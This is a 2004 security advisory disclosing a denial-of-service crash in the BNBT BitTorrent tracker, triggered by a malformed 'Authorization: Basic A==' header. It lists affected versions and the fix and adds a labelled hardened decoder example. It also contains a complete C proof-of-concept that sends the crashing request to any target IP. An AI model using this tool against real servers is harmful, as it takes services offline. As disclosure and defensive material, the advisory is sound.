[NT] BNBT BitTorrent Tracker DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 05/23/04
To: list@securiteam.com Date: 23 May 2004 14:55:20 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
BNBT BitTorrent Tracker DoS
------------------------------------------------------------------------
SUMMARY
<http://bnbt.go-dedicated.com/> BNBT was "written by Trevor Hogan. BNBT
is a complete port of the original Python BitTorrent tracker to C++ for
speed and efficiency. BNBT also offers many additional features beyond the
original Python BitTorrent tracker, plus it's easy to use and
customizable". A specially crafted HTTP GET request that carries the header
'Authorization: Basic A==' will crash the BNBT server.
DETAILS
Vulnerable Systems:
* All versions of BNBT prior to BNBT Beta 7.5 Release 3
Immune Systems:
* BNBT Beta 7.5 Release 3
The DoS problem also affects <http://bnbteasytracker.sourceforge.net/>
BNBT Easy Tracker.
A malicious attacker exploiting this vulnerability can crash the remote
tracker, and might be able to execute arbitrary code.
Vulnerable Code:
The bug is located in util.cpp in the Util_DecodeHTTPAuth function.
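The advisory does not say what goes wrong inside Util_DecodeHTTPAuth, only that the malformed credential 'A==' triggers the crash. The following decoder is an added example (not BNBT's code) of how a Basic-auth header should be handled defensively: every structural property of the base64 value is checked before a byte is written, so 'A==' (three characters, not a multiple of four) is rejected up front. It assumes the header value arrives as a NUL-terminated string and that the caller supplies the output buffer.

```c
#include <string.h>

/* Value of one base64 digit, or -1 if c is not a base64 digit. */
static int b64_val(unsigned char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Hypothetical hardened Basic-auth decoder (not BNBT's Util_DecodeHTTPAuth).
 * hdr is the NUL-terminated header value, e.g. "Basic dXNlcjpwYXNz". Writes
 * the decoded bytes to out (NUL-terminated) and returns their count, or -1
 * for malformed input: wrong scheme, length not a multiple of 4, non-base64
 * characters, misplaced or excess '=', or a result that would not fit. */
int decode_http_basic_auth(const char *hdr, char *out, size_t outlen)
{
    const char *p;
    size_t n, i, o = 0;
    unsigned int acc = 0;
    int v, bits = 0, pad = 0;

    if (out == NULL || outlen == 0 || strncmp(hdr, "Basic ", 6) != 0)
        return -1;
    p = hdr + 6;
    n = strlen(p);
    if (n == 0 || n % 4 != 0)               /* "A==" is rejected here */
        return -1;
    for (i = 0; i < n; i++) {
        if (p[i] == '=') {                  /* only the last two may be '=' */
            if (i + 2 < n || ++pad > 2) return -1;
            continue;
        }
        if (pad) return -1;                 /* data after padding */
        if ((v = b64_val((unsigned char)p[i])) < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (o + 1 >= outlen) return -1; /* keep room for the NUL */
            out[o++] = (char)((acc >> bits) & 0xFF);
        }
    }
    out[o] = '\0';
    return (int)o;
}
```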
Vendor Status:
A version of BNBT which addresses this vulnerability can be found at:
<http://bnbt.go-dedicated.com/bnbt75b-3.zip>
Proof of Concept Code:
The code was tested on Windows XP:
/****************************/
/* PoC to crash the server  */
/****************************/
/* BNBT BitTorrent Tracker Denial Of Service
Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions
Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/
The bug is located in util.cpp in the Util_DecodeHTTPAuth function.
Coded and Discovered by:
badpack3t <badpack3t@security-protocols.com>
.:sp research labs:.
www.security-protocols.com
5.21.2004
This PoC will only DoS the server to verify if it is vulnerable.
*/
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* memcpy() */
#pragma comment(lib, "ws2_32.lib")

/* The request from the advisory: a Basic credential that is not valid base64. */
char exploit[] =
    "GET / HTTP/1.0\r\n"
    "Authorization: Basic A==\r\n\r\n";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *target;
    int port, bufsize;
    SOCKET mysocket;

    if (argc < 2)
    {
        printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n"
               "<badpack3t@security-protocols.com>\r\n\r\n");
        printf("Usage:\r\n %s <targetip> [targetport] (default is 6969)\r\n\r\n",
               argv[0]);
        printf("www.security-protocols.com\r\n\r\n");
        exit(1);
    }

    /* WSAStartup returns a non-zero error code on failure, never a negative value */
    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

    target = argv[1];
    port = 6969;
    if (argc >= 3) port = atoi(argv[2]);
    bufsize = 1024;
    if (argc >= 4) bufsize = atoi(argv[3]);

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if (mysocket == INVALID_SOCKET)
    {
        printf("Socket error!\r\n");
        exit(1);
    }

    printf("Resolving Hostnames...\n");
    if ((pTarget = gethostbyname(target)) == NULL)
    {
        printf("Resolve of %s failed\n", argv[1]);
        exit(1);
    }

    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\n");
    if (connect(mysocket, (struct sockaddr *)&sock, sizeof(sock)) != 0)
    {
        printf("Couldn't connect to host.\n");
        exit(1);
    }
    printf("Connected!...\n");

    printf("Sending Payload...\n");
    if (send(mysocket, exploit, sizeof(exploit) - 1, 0) == -1)
    {
        printf("Error Sending the Exploit Payload\r\n");
        closesocket(mysocket);
        exit(1);
    }
    printf("Payload has been sent! Check if the webserver is dead.\r\n");

    closesocket(mysocket);
    WSACleanup();
    return 0;
}
ADDITIONAL INFORMATION
The information has been provided by
<mailto:badpack3t@security-protocols.com> badpack3t.
The original article can be found at:
<http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt>